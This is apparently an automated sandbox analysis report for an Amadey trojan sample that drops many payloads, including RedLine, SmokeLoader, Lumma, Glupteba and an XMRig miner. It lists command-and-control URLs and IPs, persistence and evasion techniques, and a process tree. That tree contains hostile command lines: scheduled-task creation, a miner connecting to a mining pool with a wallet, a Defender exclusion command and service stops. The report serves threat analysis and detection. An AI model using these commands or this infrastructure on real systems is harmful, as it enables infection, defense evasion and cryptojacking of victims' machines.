amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
301s
max time network
451s
platform
windows10-1703_x64
resource
win10-20231220-en
resource tags

arch:x64arch:x86image:win10-20231220-enlocale:en-usos:windows10-1703-x64system
submitted
30-01-2024 00:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://maxximbrasil.com/themes/config_20.ps1

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

redline

Botnet

@Pixelscloud

94.156.66.203:13781

Extracted

Family

amadey

Version

4.12

http://185.172.128.19

Attributes

install_dir
cd1f156d67
install_file
Utsysc.exe
strings_key
0dd3e5ee91b367c60c9e575983554b30
url_paths
/ghsdh39s/index.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

http://vatra.at/tmp/

http://spbdg.ru/tmp/

http://skinndia.com/tmp/

http://cracker.biz/tmp/

http://piratia-life.ru/tmp/

http://piratia.su/tmp/

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

risepro

193.233.132.62:50500

Extracted

Family

redline

Botnet

666

195.20.16.103:18305

Extracted

Family

lumma

https://consciouosoepewmausj.site/api

https://braidfadefriendklypk.site/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x0006000000016065-224.dat	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1468-186-0x0000000002F60000-0x000000000384B000-memory.dmp	family_glupteba
behavioral2/memory/1468-406-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000600000001605d-129.dat	family_redline
behavioral2/files/0x000600000001605d-130.dat	family_redline
behavioral2/memory/4380-132-0x0000000000900000-0x0000000000954000-memory.dmp	family_redline
behavioral2/memory/4680-447-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1208-213-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1208-193-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1208-229-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 6 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/files/0x000600000000767d-109.dat	net_reactor
behavioral2/files/0x000600000000767d-108.dat	net_reactor
behavioral2/memory/3156-110-0x0000000000150000-0x000000000062A000-memory.dmp	net_reactor
behavioral2/files/0x00050000000076d6-118.dat	net_reactor
behavioral2/files/0x00050000000076d6-144.dat	net_reactor
behavioral2/files/0x00050000000076d6-143.dat	net_reactor

Executes dropped EXE 17 IoCs

Processes:

gpupdate.exerty45.exe23.exelolMiner.exeinstalls.exesvcservice.exePCclear_Eng_mini.exe659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exetidex_-_short_stuff.exema.exefortnite2.exepixelcloudnew2.exe.exevenom.exebuildcosta.exee0cbefcb1af40c7d4aff4aca26621a98.exetoolspub1.exe

pid	Process
616	gpupdate.exe
952	rty45.exe
3832	23.exe
3568	lolMiner.exe
1300	installs.exe
4572	svcservice.exe
616	PCclear_Eng_mini.exe
3060	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
3716	tidex_-_short_stuff.exe
3156	ma.exe
4448	fortnite2.exe
4380	pixelcloudnew2.exe
4724	.exe
5036	venom.exe
2368	buildcosta.exe
1468	e0cbefcb1af40c7d4aff4aca26621a98.exe
1000	toolspub1.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x00040000000006bd-36.dat	upx
behavioral2/files/0x00040000000006bd-37.dat	upx
behavioral2/memory/3568-38-0x00007FF6ADB70000-0x00007FF6B22CB000-memory.dmp	upx
behavioral2/memory/1208-191-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-194-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-210-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-213-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-208-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-206-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-205-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-193-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-189-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-230-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-229-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1208-188-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

23.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1775739321-368907234-981748298-1000\Software\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe"	23.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
40	raw.githubusercontent.com
41	raw.githubusercontent.com
86	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
183	ipinfo.io
195	ip-api.com
160	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

Processes:

gpupdate.exe.exe

description	pid	Process	procid_target
PID 616 set thread context of 3888	616	gpupdate.exe	57
PID 4724 set thread context of 1208	4724	.exe	120

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
5468	sc.exe
6148	sc.exe
6156	sc.exe
6420	sc.exe
1328	sc.exe
5544	sc.exe
6008	sc.exe
4904	sc.exe
3880	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral2/files/0x000700000001abcc-291.dat	pyinstaller
behavioral2/files/0x000700000001abcc-297.dat	pyinstaller
behavioral2/files/0x000700000001abcc-372.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3852	1300	WerFault.exe	82
2964	3716	WerFault.exe	88
2232	1468	WerFault.exe	107
4140	1468	WerFault.exe	107
4708	1468	WerFault.exe	107
216	1468	WerFault.exe	107
4356	1468	WerFault.exe	107
4152	1468	WerFault.exe	107
3860	1468	WerFault.exe	107
3036	1468	WerFault.exe	107
5032	1468	WerFault.exe	107
344	1468	WerFault.exe	107
1520	1468	WerFault.exe	107
2888	1468	WerFault.exe	107
1352	1468	WerFault.exe	107
3056	1468	WerFault.exe	107
3076	1468	WerFault.exe	107
4612	1468	WerFault.exe	107
4616	1468	WerFault.exe	107
4252	1468	WerFault.exe	107
3400	1468	WerFault.exe	107
3560	5696	WerFault.exe	203
5400	1148	WerFault.exe	225

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exetoolspub1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
1096	schtasks.exe
4288	schtasks.exe
3036	schtasks.exe
5208	schtasks.exe
872	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
1356	timeout.exe
1920	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
4496	tasklist.exe
5488	tasklist.exe

Kills process with taskkill 7 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
5872	taskkill.exe
5124	taskkill.exe
5240	taskkill.exe
6136	taskkill.exe
6132	taskkill.exe
6160	taskkill.exe
6704	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

PCclear_Eng_mini.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}	PCclear_Eng_mini.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024"	PCclear_Eng_mini.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
7012	PING.EXE

Suspicious behavior: EnumeratesProcesses 49 IoCs

Processes:

gpupdate.exe659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe.exetoolspub1.exe

pid	Process
616	gpupdate.exe
616	gpupdate.exe
616	gpupdate.exe
616	gpupdate.exe
3060	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
3060	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
4724	.exe
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
3324
1000	toolspub1.exe
1000	toolspub1.exe
3324
3324
3324
3324

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe

pid	Process
3060	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

4363463463464363463463463.exeAUDIODG.EXEma.exe.exevbc.exe

description	pid	Process
Token: SeDebugPrivilege	2084	4363463463464363463463463.exe
Token: 33	980	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	980	AUDIODG.EXE
Token: SeDebugPrivilege	3156	ma.exe
Token: SeDebugPrivilege	4724	.exe
Token: SeLockMemoryPrivilege	1208	vbc.exe
Token: SeLockMemoryPrivilege	1208	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid	Process
1208	vbc.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

PCclear_Eng_mini.exevenom.exe

pid	Process
616	PCclear_Eng_mini.exe
616	PCclear_Eng_mini.exe
5036	venom.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exegpupdate.exe23.exema.execmd.exe.execmd.exebuildcosta.exe

description	pid	Process	procid_target
PID 2084 wrote to memory of 616	2084	4363463463464363463463463.exe	76
PID 2084 wrote to memory of 616	2084	4363463463464363463463463.exe	76
PID 616 wrote to memory of 3888	616	gpupdate.exe	57
PID 2084 wrote to memory of 952	2084	4363463463464363463463463.exe	77
PID 2084 wrote to memory of 952	2084	4363463463464363463463463.exe	77
PID 2084 wrote to memory of 3832	2084	4363463463464363463463463.exe	78
PID 2084 wrote to memory of 3832	2084	4363463463464363463463463.exe	78
PID 2084 wrote to memory of 3832	2084	4363463463464363463463463.exe	78
PID 2084 wrote to memory of 3568	2084	4363463463464363463463463.exe	80
PID 2084 wrote to memory of 3568	2084	4363463463464363463463463.exe	80
PID 2084 wrote to memory of 1300	2084	4363463463464363463463463.exe	82
PID 2084 wrote to memory of 1300	2084	4363463463464363463463463.exe	82
PID 2084 wrote to memory of 1300	2084	4363463463464363463463463.exe	82
PID 3832 wrote to memory of 4572	3832	23.exe	79
PID 3832 wrote to memory of 4572	3832	23.exe	79
PID 3832 wrote to memory of 4572	3832	23.exe	79
PID 2084 wrote to memory of 616	2084	4363463463464363463463463.exe	86
PID 2084 wrote to memory of 616	2084	4363463463464363463463463.exe	86
PID 2084 wrote to memory of 616	2084	4363463463464363463463463.exe	86
PID 2084 wrote to memory of 3060	2084	4363463463464363463463463.exe	87
PID 2084 wrote to memory of 3060	2084	4363463463464363463463463.exe	87
PID 2084 wrote to memory of 3060	2084	4363463463464363463463463.exe	87
PID 2084 wrote to memory of 3716	2084	4363463463464363463463463.exe	88
PID 2084 wrote to memory of 3716	2084	4363463463464363463463463.exe	88
PID 2084 wrote to memory of 3716	2084	4363463463464363463463463.exe	88
PID 2084 wrote to memory of 3156	2084	4363463463464363463463463.exe	92
PID 2084 wrote to memory of 3156	2084	4363463463464363463463463.exe	92
PID 3156 wrote to memory of 3588	3156	ma.exe	95
PID 3156 wrote to memory of 3588	3156	ma.exe	95
PID 3588 wrote to memory of 1356	3588	cmd.exe	138
PID 3588 wrote to memory of 1356	3588	cmd.exe	138
PID 2084 wrote to memory of 4448	2084	4363463463464363463463463.exe	96
PID 2084 wrote to memory of 4448	2084	4363463463464363463463463.exe	96
PID 2084 wrote to memory of 4448	2084	4363463463464363463463463.exe	96
PID 2084 wrote to memory of 4380	2084	4363463463464363463463463.exe	97
PID 2084 wrote to memory of 4380	2084	4363463463464363463463463.exe	97
PID 2084 wrote to memory of 4380	2084	4363463463464363463463463.exe	97
PID 3588 wrote to memory of 4724	3588	cmd.exe	98
PID 3588 wrote to memory of 4724	3588	cmd.exe	98
PID 2084 wrote to memory of 5036	2084	4363463463464363463463463.exe	99
PID 2084 wrote to memory of 5036	2084	4363463463464363463463463.exe	99
PID 2084 wrote to memory of 5036	2084	4363463463464363463463463.exe	99
PID 4724 wrote to memory of 4984	4724	.exe	101
PID 4724 wrote to memory of 4984	4724	.exe	101
PID 4984 wrote to memory of 4288	4984	cmd.exe	273
PID 4984 wrote to memory of 4288	4984	cmd.exe	273
PID 2084 wrote to memory of 2368	2084	4363463463464363463463463.exe	104
PID 2084 wrote to memory of 2368	2084	4363463463464363463463463.exe	104
PID 2084 wrote to memory of 2368	2084	4363463463464363463463463.exe	104
PID 2368 wrote to memory of 1096	2368	buildcosta.exe	102
PID 2368 wrote to memory of 1096	2368	buildcosta.exe	102
PID 2368 wrote to memory of 1096	2368	buildcosta.exe	102
PID 2368 wrote to memory of 1468	2368	buildcosta.exe	107
PID 2368 wrote to memory of 1468	2368	buildcosta.exe	107
PID 2368 wrote to memory of 1468	2368	buildcosta.exe	107
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 4724 wrote to memory of 1208	4724	.exe	120
PID 2368 wrote to memory of 1000	2368	buildcosta.exe	122
PID 2368 wrote to memory of 1000	2368	buildcosta.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:616
- C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
  2⤵
  - Executes dropped EXE
  PID:952
- C:\Users\Admin\AppData\Local\Temp\Files\23.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\23.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
    "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
    3⤵
    - Executes dropped EXE
    PID:4572
- C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lolMiner.exe"
  2⤵
  - Executes dropped EXE
  PID:3568
- C:\Users\Admin\AppData\Local\Temp\Files\installs.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\installs.exe"
  2⤵
  - Executes dropped EXE
  PID:1300
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 956
    3⤵
    - Program crash
    PID:3852
- C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:616
- C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3060
- C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tidex_-_short_stuff.exe"
  2⤵
  - Executes dropped EXE
  PID:3716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 740
    3⤵
    - Program crash
    PID:2964
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEEF0.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4724
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4984
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4288
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1208
- C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe"
  2⤵
  - Executes dropped EXE
  PID:4448
- C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pixelcloudnew2.exe"
  2⤵
  - Executes dropped EXE
  PID:4380
- C:\Users\Admin\AppData\Local\Temp\Files\venom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\venom.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5036
- C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    - Executes dropped EXE
    PID:1468
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 388
      4⤵
      Program crash
      PID:2232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 248
      4⤵
      Program crash
      PID:4140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 620
      4⤵
      Program crash
      PID:4708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 740
      4⤵
      Program crash
      PID:216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 732
      4⤵
      Program crash
      PID:4356
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 704
      4⤵
      Program crash
      PID:4152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 672
      4⤵
      Program crash
      PID:3860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 784
      4⤵
      Program crash
      PID:3036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 536
      4⤵
      Program crash
      PID:5032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 820
      4⤵
      Program crash
      PID:344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 400
      4⤵
      Program crash
      PID:1520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 796
      4⤵
      Program crash
      PID:2888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 832
      4⤵
      Program crash
      PID:1352
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 800
      4⤵
      Program crash
      PID:3056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 864
      4⤵
      Program crash
      PID:3076
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 688
      4⤵
      Program crash
      PID:4612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 704
      4⤵
      Program crash
      PID:4616
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 540
      4⤵
      Program crash
      PID:4252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 912
      4⤵
      Program crash
      PID:3400
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3576
- - C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    PID:1000
- - C:\Users\Admin\AppData\Local\Temp\1000127001\InstallSetup7.exe
    "C:\Users\Admin\AppData\Local\Temp\1000127001\InstallSetup7.exe"
    3⤵
    PID:2372
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      PID:2360
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:1360
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:4064
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:3036
  - - C:\Users\Admin\AppData\Local\Temp\nst1FA7.tmp
      C:\Users\Admin\AppData\Local\Temp\nst1FA7.tmp
      4⤵
      PID:4480
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nst1FA7.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:3008
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:1920
- - C:\Users\Admin\AppData\Local\Temp\1000129001\FirstZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1000129001\FirstZ.exe"
    3⤵
    PID:5632
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:4728
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:6420
